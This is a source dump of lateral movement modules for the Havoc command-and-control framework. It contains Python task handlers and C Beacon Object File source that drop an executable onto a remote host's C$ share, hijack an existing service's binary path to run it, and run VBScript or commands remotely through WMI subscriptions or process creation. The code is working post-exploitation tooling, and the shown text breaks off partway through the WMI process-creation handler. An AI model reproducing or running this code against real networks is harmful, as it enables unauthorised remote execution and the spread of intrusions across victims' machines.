4 | def psexec( demonID, *param ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer : Packer = Packer() 8 | 9 | Host : str = "" 10 | SvcName : str = "" 11 | SvcPath : str = "" 12 | SvcBinary : bytes = b'' 13 | 14 | demon = Demon( demonID ) 15 | 16 | if len(param) < 3: 17 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 18 | 
return False 19 | 20 | if len(param) > 3: 21 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many arguments" ) 22 | return False 23 | 24 | Host = param[ 0 ] 25 | SvcName = param[ 1 ] 26 | SvcPath = param[ 2 ] 27 | 28 | if exists( SvcPath ) is False: 29 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Service executable not found: {SvcPath}" ) 30 | return False 31 | else: 32 | SvcBinary = open( SvcPath, 'rb' ).read()  # NOTE(review): handle is never closed explicitly (no with-block)
33 | if len(SvcBinary) == 0: 34 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Specified service executable is empty" ) 35 | return False 36 | 37 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to execute {SvcPath} on {Host} using psexec" ) 38 | 39 | packer.addstr( Host ) 40 | packer.addstr( SvcName ) 41 | packer.addstr( SvcBinary ) 42 | packer.addstr( "\\\\" + Host + "\\C$\\Windows\\" + SvcName + ".exe" )  # remote path the BOF writes the binary to and registers as the service image; the BOF deletes it again after StartServiceA
43 | 44 | demon.InlineExecute( TaskID, "go", f"psexec.{demon.ProcessArch}.o", packer.getbuffer(), False ) 45 | 46 | return TaskID 47 | 48 | RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) 49 | RegisterCommand( psexec, "jump-exec", "psexec", "executes specified service on target host ", 0, "[Host] [Service Name] [Local Path]", "DOMAIN-DC AgentSvc /tmp/MyAgentSvc.exe" ) 50 | -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/Psexec/psexec.x64.o -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/Psexec/psexec.x86.o -------------------------------------------------------------------------------- 
/Jump-exec/ScShell/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, 
char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /Jump-exec/ScShell/makefile: -------------------------------------------------------------------------------- 1 | BOF := scshell 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o $(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded $(BOF).x64.o 10 | $(CC_x86) -o $(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded $(BOF).x86.o 12 | 13 | clean: 14 | rm $(BOF).o -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.c: -------------------------------------------------------------------------------- 1 | /* 2 | Full credit goes to Mr-Un1k0d3r. 
This bof is based on his implementation https://github.com/Mr-Un1k0d3r/SCShell/blob/master/CS-BOF/scshellbof.c 3 | */ 4 | 5 | #include 6 | #include "beacon.h" 7 | 8 | /* Defines */ 9 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA( 10 | LPCSTR lpFileName, 11 | DWORD dwDesiredAccess, 12 | DWORD dwShareMode, 13 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 14 | DWORD dwCreationDisposition, 15 | DWORD dwFlagsAndAttributes, 16 | HANDLE hTemplateFile 17 | ); 18 | 19 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile( 20 | HANDLE hFile, 21 | LPCVOID lpBuffer, 22 | DWORD nNumberOfBytesToWrite, 23 | LPDWORD lpNumberOfBytesWritten, 24 | LPOVERLAPPED lpOverlapped 25 | ); 26 | 27 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA( 28 | LPCSTR lpMachineName, 29 | LPCSTR lpDatabaseName, 30 | DWORD dwDesiredAccess 31 | ); 32 | 33 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA( 34 | SC_HANDLE hSCManager, 35 | LPCSTR lpServiceName, 36 | DWORD dwDesiredAccess 37 | ); 38 | 39 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA( 40 | SC_HANDLE hService, 41 | DWORD dwNumServiceArgs, 42 | LPCSTR* lpServiceArgVectors 43 | ); 44 | 45 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA( 46 | SC_HANDLE hService, 47 | LPQUERY_SERVICE_CONFIGA lpServiceConfig, 48 | DWORD cbBufSize, 49 | LPDWORD pcbBytesNeeded 50 | ); 51 | 52 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA( 53 | SC_HANDLE hService, 54 | DWORD dwServiceType, 55 | DWORD dwStartType, 56 | DWORD dwErrorControl, 57 | LPCSTR lpBinaryPathName, 58 | LPCSTR lpLoadOrderGroup, 59 | LPDWORD lpdwTagId, 60 | LPCSTR lpDependencies, 61 | LPCSTR lpServiceStartName, 62 | LPCSTR lpPassword, 63 | LPCSTR lpDisplayName 64 | ); 65 | 66 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle( SC_HANDLE hSCObject ); 67 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService( SC_HANDLE hService ); 68 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(); 69 | WINBASEAPI VOID WINAPI KERNEL32$CloseHandle( HANDLE Handle ); 70 | WINBASEAPI HLOCAL WINAPI 
KERNEL32$LocalAlloc( UINT, SIZE_T ); 71 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree( HLOCAL ); 72 | 73 | 74 | /* scshell entrypoint code */ 75 | VOID go( PVOID Buffer, ULONG Length ) 76 | { 77 | datap Parser = { 0 }; 78 | DWORD SvcBinarySize = 0; 79 | DWORD Written = 0; 80 | DWORD SvcQuerySize = 0; 81 | PCHAR Host = NULL; 82 | PCHAR SvcName = NULL; 83 | PCHAR SvcBinary = NULL; 84 | PCHAR SvcPath = NULL; 85 | BOOL Success = FALSE; 86 | 87 | HANDLE hFile = NULL; 88 | HANDLE hSvcManager = NULL; 89 | HANDLE hSvcService = NULL; 90 | 91 | LPQUERY_SERVICE_CONFIGA SvcConfig = NULL; 92 | PCHAR SvcOrgPath = NULL; 93 | DWORD SvcConfSize = 0; 94 | 95 | /* Prepare our argument buffer */ 96 | BeaconDataParse( &Parser, Buffer, Length ); 97 | 98 | /* Parse our arguments */ 99 | Host = BeaconDataExtract( &Parser, NULL ); 100 | SvcName = BeaconDataExtract( &Parser, NULL ); 101 | SvcBinary = BeaconDataExtract( &Parser, &SvcBinarySize ); 102 | SvcPath = BeaconDataExtract( &Parser, NULL ); 103 | 104 | /* Upload service file to target machine (overwrite existing file)*/ 105 | hFile = KERNEL32$CreateFileA( SvcPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); 106 | if ( hFile == INVALID_HANDLE_VALUE ) 107 | { 108 | BeaconPrintf( CALLBACK_ERROR, "CreateFileA Failed: %d", KERNEL32$GetLastError() ); 109 | goto EXIT; 110 | } 111 | 112 | if ( ! KERNEL32$WriteFile( hFile, SvcBinary, SvcBinarySize, &Written, NULL ) ) 113 | { 114 | BeaconPrintf( CALLBACK_ERROR, "WriteFile Failed: %d", KERNEL32$GetLastError() ); 115 | goto EXIT; 116 | } 117 | 118 | BeaconPrintf( CALLBACK_OUTPUT, "Dropped service executable on %s at %s", Host, SvcPath ); 119 | 120 | /* Close the file */ 121 | KERNEL32$CloseHandle( hFile ); 122 | hFile = NULL; 123 | 124 | /* Open Service manager. Create and start our service. The magic happens here :P */ 125 | // NOTE: OpenSCManagerA is going to use SERVICES_ACTIVE_DATABASE by default if lpDatabaseName == NULL. 
126 | hSvcManager = ADVAPI32$OpenSCManagerA( Host, NULL, SC_MANAGER_ALL_ACCESS ); 127 | if ( ! hSvcManager ) 128 | { 129 | BeaconPrintf( CALLBACK_ERROR, "OpenSCManagerA Failed: %x", KERNEL32$GetLastError() ); 130 | goto EXIT; 131 | } 132 | 133 | hSvcService = ADVAPI32$OpenServiceA( hSvcManager, SvcName, SERVICE_ALL_ACCESS ); 134 | if ( ! hSvcService ) 135 | { 136 | BeaconPrintf( CALLBACK_ERROR, "OpenServiceA Failed: %d", KERNEL32$GetLastError() ); 137 | goto EXIT; 138 | } 139 | 140 | SvcQuerySize = 0; 141 | ADVAPI32$QueryServiceConfigA( hSvcService, NULL, 0, &SvcQuerySize ); 142 | if ( SvcQuerySize ) 143 | { 144 | SvcConfSize = SvcQuerySize; 145 | SvcConfig = KERNEL32$LocalAlloc( LPTR, SvcQuerySize ); 146 | SvcQuerySize = 0; 147 | if ( ! ADVAPI32$QueryServiceConfigA( hSvcService, SvcConfig, SvcConfSize, &SvcQuerySize ) ) 148 | { 149 | BeaconPrintf( CALLBACK_ERROR, "QueryServiceConfigA [2]. Failed: %d", KERNEL32$GetLastError() ); 150 | goto EXIT; 151 | } 152 | 153 | SvcOrgPath = SvcConfig->lpBinaryPathName; 154 | BeaconPrintf( CALLBACK_OUTPUT, "Service original path: %s\n", SvcOrgPath ); 155 | } 156 | 157 | if ( ! ADVAPI32$ChangeServiceConfigA( hSvcService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcPath, NULL, NULL, NULL, NULL, NULL, NULL ) ) 158 | { 159 | BeaconPrintf( CALLBACK_ERROR, "ChangeServiceConfigA Failed: %d", KERNEL32$GetLastError() ); 160 | goto EXIT; 161 | } 162 | 163 | BeaconPrintf( CALLBACK_OUTPUT, "Service path changed to: %s", SvcPath ); 164 | 165 | // TODO: check if service is dead after starting it. maybe we trying to start a buggy one... 166 | // TODO: add check for ERROR_SERVICE_REQUEST_TIMEOUT 167 | if ( ! ADVAPI32$StartServiceA( hSvcService, 0, NULL ) ) 168 | { 169 | BeaconPrintf( CALLBACK_ERROR, "CreateServiceA Failed: %x", KERNEL32$GetLastError() ); 170 | goto EXIT; 171 | } 172 | BeaconPrintf( CALLBACK_OUTPUT, "Service %s started", SvcName ); 173 | 174 | if ( SvcOrgPath ) 175 | { 176 | if ( ! 
ADVAPI32$ChangeServiceConfigA( hSvcService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcOrgPath, NULL, NULL, NULL, NULL, NULL, NULL ) ) 177 | { 178 | BeaconPrintf( CALLBACK_ERROR, "ChangeServiceConfigA Failed: %x", KERNEL32$GetLastError() ); 179 | goto EXIT; 180 | } 181 | BeaconPrintf( CALLBACK_OUTPUT, "Service path restored to original: %s", SvcOrgPath ); 182 | } 183 | 184 | Success = TRUE; 185 | 186 | EXIT: 187 | if ( hFile ) 188 | { 189 | KERNEL32$CloseHandle( hFile ); 190 | hFile = NULL; 191 | } 192 | /* NOTE(review): DeleteService() is called unconditionally here, including when hSvcService is NULL and even though this BOF only reconfigures an existing service (OpenServiceA) rather than creating one; confirm this is intended. */ 193 | if ( ! ADVAPI32$DeleteService( hSvcService ) ) 194 | BeaconPrintf( CALLBACK_ERROR, "Failed to delete Service %s on %s: %d", SvcName, Host, KERNEL32$GetLastError() ); 195 | 196 | if ( SvcConfig ) 197 | { 198 | KERNEL32$LocalFree( SvcConfig ); 199 | SvcConfig = NULL; 200 | } 201 | 202 | if ( hSvcService ) 203 | { 204 | ADVAPI32$CloseServiceHandle( hSvcService ); 205 | hSvcService = NULL; 206 | } 207 | 208 | if ( hSvcManager ) 209 | { 210 | ADVAPI32$CloseServiceHandle( hSvcManager ); 211 | hSvcManager = NULL; 212 | } 213 | 214 | if ( Success ) 215 | BeaconPrintf( CALLBACK_OUTPUT, "scshell successful executed on %s", Host ); 216 | else 217 | BeaconPrintf( CALLBACK_ERROR, "scshell failed to execut on %s", Host ); 218 | } 219 | -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 
# Client-side handler for the "jump-exec scshell" command.
# Same packing layout as psexec.py (host, service name, file bytes, remote
# drop path), but the BOF side changes the binary path of an existing
# service instead of creating one (see the RegisterCommand description).
# Returns the TaskID from ConsoleWrite, or None after reporting an argument
# or file error on the console.
# NOTE(review): Packer is used below but not imported on line 1; presumably it
# is provided by the havoc runtime namespace -- confirm.
4 | def scshell( demonID, *params ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer : Packer = Packer() 8 | 9 | Host : str = "" 10 | SvcName : str = "" 11 | SvcPath : str = "" 12 | SvcBinary : bytes = b'' 13 | 14 | demon = Demon( demonID ) 15 | 
# NOTE(review): the guard only rejects fewer than 2 params, yet params[2] is
# read below, so exactly two arguments raise IndexError instead of the
# "Not enough arguments" message; there is also no upper bound, unlike
# psexec.py.
16 | if len(params) < 2: 17 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 18 | return 19 | else: 20 | Host = params[ 0 ] 21 | SvcName = params[ 1 ] 22 | 
SvcPath = params[ 2 ] 23 | 24 | if exists( SvcPath ) == False: 25 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Service executable not found: {SvcPath}" ) 26 | return 27 | else: 28 | SvcBinary = open( SvcPath, 'rb' ).read()  # NOTE(review): handle is never closed explicitly (no with-block)
29 | if len(SvcBinary) == 0: 30 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Specified service executable is empty" ) 31 | return 32 | 33 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to execute {SvcPath} on {Host} using scshell" ) 34 | 35 | packer.addstr( Host ) 36 | packer.addstr( SvcName ) 37 | packer.addstr( SvcBinary ) 38 | packer.addstr( "\\\\" + Host + "\\C$\\Windows\\" + SvcName + ".exe" )  # remote path the BOF writes the binary to and sets as the service's image path before restoring the original
39 | 40 | demon.InlineExecute( TaskID, "go", f"scshell.{demon.ProcessArch}.o", packer.getbuffer(), False ) 41 | 42 | return TaskID 43 | 44 | RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) 45 | RegisterCommand( scshell, "jump-exec", "scshell", "Changes service executable path of an existing service to our specified service executable over RPC", 0, "[Host] [Target Service Name] [Local Path]", "DOMAIN-DC AppVClient /tmp/MyAgentSvc.exe" ) 46 | -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/ScShell/scshell.x64.o -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/ScShell/scshell.x86.o -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/bin/EventSub.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/WMI/EventSub/bin/EventSub.x64.o -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int 
value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 63 | -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := EventSub 2 | CC_x64 := x86_64-w64-mingw32-g++ 3 | CC_x86 := i686-w64-mingw32-g++ 4 | 5 | all: 6 | $(CC_x64) -o bin/$(BOFNAME).x64.o -c source/WMI-EventSub.cpp -I include -w 7 | -------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/bin/ProcCreate.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/WMI/ProcCreate/bin/ProcCreate.x64.o 
-------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 
0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 63 | -------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := ProcCreate 2 | CC_x64 := x86_64-w64-mingw32-g++ 3 | 4 | all: 5 | $(CC_x64) -o bin/$(BOFNAME).x64.o -c source/WMI-ProcessCreate.cpp -I include -l comsuppw -l comsuppwd -w 6 | -------------------------------------------------------------------------------- /Jump-exec/WMI/makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: $(SUBDIRS) 6 | 7 | $(SUBDIRS): 8 | @if [ -f $@/makefile ]; then \ 9 | echo "Building $@"; \ 10 | $(MAKE) -C $@; \ 11 | else \ 12 | echo "Skipping $@ (makefile not found)"; \ 13 | fi 14 | 
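# -------------------------------------------------------------------------------- /Jump-exec/WMI/wmi.py: --------------------------------------------------------------------------------
from havoc import Demon, RegisterCommand, RegisterModule
import re

# NOTE(review): Packer is used below but is not imported in this file; presumably the
# Havoc script loader injects it into the module globals (the sibling modules rely on
# the same thing) -- confirm before running this standalone.

# Both commands take two mandatory parameters (target + script path / command line)
# optionally followed by an all-or-nothing explicit-credential triple.
_MIN_PARAMS  = 2
_CRED_PARAMS = 3
_MAX_PARAMS  = _MIN_PARAMS + _CRED_PARAMS


def _wmi_credentials( demon, params ):
    """Validate the parameter count and extract the optional credential triple.

    Returns ``(is_current, username, password, domain)``: ``(True, '', '', '')`` when the
    demon's current security context should be used, or ``(False, user, pass, domain)``
    when exactly three extra parameters were supplied.  Writes an error to the console and
    returns ``None`` when the count is wrong (fewer than two, more than five, or a partial
    credential triple).
    """
    num_params = len( params )

    if num_params < _MIN_PARAMS:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" )
        return None

    if num_params > _MAX_PARAMS:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
        return None

    extra = num_params - _MIN_PARAMS
    if extra == 0:
        return True, '', '', ''

    if extra != _CRED_PARAMS:
        # three or four parameters means a partial username/password/domain triple
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" )
        return None

    # explicit creds live at indexes 2, 3, 4 (the original read 3, 4, 5 and raised
    # IndexError on the only branch that could reach it)
    username, password, domain = params[ _MIN_PARAMS : _MAX_PARAMS ]
    return False, username, password, domain


def _wmi_pack( packer, target, creds, payload ):
    """Serialise the BOF arguments in the order the WMI object files consume them.

    ``creds`` is the tuple returned by ``_wmi_credentials``; ``payload`` is the VBScript
    text or the command line.  The wire order (target, domain, username, password,
    payload, is_current) is fixed by the BOF side and must not be reordered.
    """
    is_current, username, password, domain = creds
    packer.addWstr( target )
    packer.addWstr( domain )
    packer.addWstr( username )
    packer.addWstr( password )
    packer.addWstr( payload )
    packer.addbool( is_current )


def wmi_eventsub( demonID, *params ):
    """Register a WMI event subscription on the target that runs a local VBScript file.

    params: target, local_script_path [, username, password, domain].  Only x64 demons
    are supported.  Returns the task id, or False after reporting the error.
    """
    TaskID : str = None
    demon : Demon = None
    packer = Packer()
    demon = Demon( demonID )

    if demon.ProcessArch == 'x86':
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" )
        return False

    creds = _wmi_credentials( demon, params )
    if creds is None:
        return False

    target = f'\\\\{params[ 0 ]}\\ROOT\\SUBSCRIPTION'

    # read the script before tasking so a bad path is reported locally, not by the BOF
    try:
        with open( params[ 1 ], 'r' ) as f:
            vbscript = f.read()
    except OSError:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Invalid vbscript path" )
        return False

    _wmi_pack( packer, target, creds, vbscript )

    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to run a VBS script in {target} via wmi" )

    demon.InlineExecute( TaskID, "go", f"EventSub/bin/EventSub.{demon.ProcessArch}.o", packer.getbuffer(), False )

    return TaskID


def wmi_proccreate( demonID, *params ):
    """Create a process on the target through WMI (ROOT\\CIMV2).

    params: target, command [, username, password, domain].  Only x64 demons are
    supported.  Returns the task id, or False after reporting the error.
    """
    TaskID : str = None
    demon : Demon = None
    packer = Packer()
    demon = Demon( demonID )

    if demon.ProcessArch == 'x86':
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" )
        return False

    # the original tested ``num_params == 6`` after rejecting anything above 5, so the
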